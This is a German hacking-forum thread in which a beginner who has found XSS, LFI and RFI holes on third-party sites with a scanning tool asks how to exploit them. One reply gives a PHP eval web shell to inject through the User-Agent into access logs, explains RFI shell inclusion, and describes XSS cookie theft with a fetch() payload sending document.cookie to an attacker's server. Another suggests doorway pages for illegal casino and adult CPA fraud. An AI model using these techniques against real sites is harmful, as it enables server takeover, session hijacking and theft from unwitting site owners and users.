Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Was mit XSS/LFI/RFI anfangen?

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
Alsuna

Alsuna

    Noob

  • Premium Member
  • Likes
    2
  • 9 Beiträge
  • 1 Bedankt
  • Spender

Hallo zusammen,

 

ich nutze den SQLI Dumper 9.9 und habe dort mittlerweile ein paar XSS/LFI/RFI Lücken angesammelt. Aber ich weiß noch nicht ganz was ich damit anfangen kann. Ich werde mir gleich mal den Quasibot genauer anschauen und mal schauen was sich damit so anrichten lässt. Ich wäre auch daran interessiert auf den Seiten Quasi eine Weiterleitung einzurichten heißt also www.infectedurl.de/meinordner/meinscript von dort man auf das von mir ausgewählte Ziel weitergeleitet wird. Ist das irgendwie möglich. Oder habt ihr noch ein paar andere Anregungen für mich?

Bin leider ein absoluter Anfänger auf diesem Gebiet, kann allerdings relativ gut PHP was mir vll. wenigstens ein wenig weiter hilft :D

 

Beste Grüße

Alsuna



#2
DR.zydz

DR.zydz

    Altes Haus

  • Elite Member
  • Likes
    234
  • 258 Beiträge
  • 430 Bedankt
  • 631033078
  • Android [root]
  • Windows, Linux

Mit LFI/RFI kann man relativ viel anfangen. Was mir dabei sofort in den Kopf schießt, ist Shellspawning. Somit kannst du Kontrolle über den Server übernehmen (im besten Fall).

Mit XSS ist es etwas schwieriger. Kommt drauf an, was es für eine Art von XSS ist.


  • Ch!ller und Alsuna gefällt das

Dzu5d.jpg

 

DHHC


#3
IRET

IRET

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    74
  • 20 Beiträge
  • 8 Bedankt

LFI: Wenn es tatsächlich eine LFI ist und keine LFD/Path Traversal (LFI führt das File aus, LFD zeigt es nur an), dann kannst du dir eine kleine Shell schreiben und diese zB. im Useragent setzen. Dann kannst du die access.log suchen und in der LFI verwenden.

 

Hier ein Beispiel für PHP (bei anderen musst die Shell einfach ändern):

Useragent: <?php eval($_GET['c']; ?>

 

 

RFI: Das ist eigentlich die einfachste Lücke. Einfach eine Shell irgendwo hochladen wo es direkt aufrufbar ist und einbinden.

 

 

XSS: XSS kommt es erstmals darauf an ob es eine reflected oder stored XSS ist. Dann auch wo die Lücke ist. XSS ist client-side, das heißt du verwendest XSS immer um etwas im Namen eines Benutzers auszuführen. Dieser muss aber dein Payload aufrufen, also musst du irgendwie dafür sorgen dass er entweder deinen Link öffnet oder auf deine gespeicherten Daten zugreift (bei einem TIcketsystem ist das einfach). Um eine XSS vernünftig auszunutzen schickst du dir den Cookie des Users und verwendest ihn selber (Session Hijacking). Allerdings funktioniert das nicht wenn der Cookie auf HttpOnly gesetzt ist. Dann schreibst du ein JS-Payload das auf das betroffene System zugeschnitten ist. Das Payload fügt meistens einfach einen neuen Benutzer hinzu oder ändert das Passwort des Opfers (da bei den meisten Scripts der User nicht ausgeloggt wird wenn das Passwort geändert wird, hast du genug Zeit um von dort mehr zu machen).

 

Wenn du Daten über JS auf deinen Server senden willst, dann musst du auf deinem Server CORS-Header auf * setzen (sonst kommt nichts an). Ein Payload zum senden der Cookies wäre zB so:

fetch('

Please Login HERE or Register HERE to see this link!

' + encodeURI(document.cookie));


  • Ch!ller, CyberFlash, DR.zydz und 2 anderen gefällt das

#4
lisek

lisek

    Pentester

  • Premium Member
  • Likes
    72
  • 100 Beiträge
  • 311 Bedankt
  • Android
  • Windows, Linux

z.B Doorways page machen für Adult CPA etc => $$(BTC/WMZ/PM)

es gibt viele cpa network die dies traffic accept ^^ hauptsacht für illegal Cainso / Adult ^^


Cracked-Scriptz <3

https://cracked-scriptz.ru/




  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 2 Mitglied(ern) gelesen


    Bot4ng, kiwitone
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.